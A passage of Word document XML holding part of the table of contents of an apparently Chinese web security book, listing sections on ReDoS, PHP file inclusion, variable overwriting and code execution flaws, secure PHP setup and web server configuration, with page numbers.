        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>则引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的血</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ReDOS</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>311</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="55"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.589998pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2056" coordorigin="254,392" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:391;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1317;top:413;width:7139;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7118" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="2"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>PHP</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>安全</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>317</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:459;width:810;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>14</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-33"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>13.7</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>315</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="536" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>含漏洞</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>317</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>本地文件包含</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>319</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>远程文件包含</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>323</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>本地文件包含的利用技巧</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>323</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>覆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>盖漏洞</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>331</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>全局变量覆盖</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>331</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>extract()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>变量覆盖</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>334</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>遍历初始化变量</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>334</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import_request_variables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>变量覆盖</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>335</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>parse_str()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>变量覆盖</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>335</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>执</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>行漏洞</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>336</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2114" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2113" w:right="0" w:hanging="588"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>“危险函数”执行代码</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>336</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2114" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2113" w:right="0" w:hanging="588"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>“文件写入”执行代码</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>343</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>其他执行代码方式</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>344</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>定制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-36"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>环境</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>348</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.639992pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2128" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1315;top:414;width:7141;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7120" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>Web</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="8"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>Server</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>配置</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>安</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>全</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>353</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:810;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
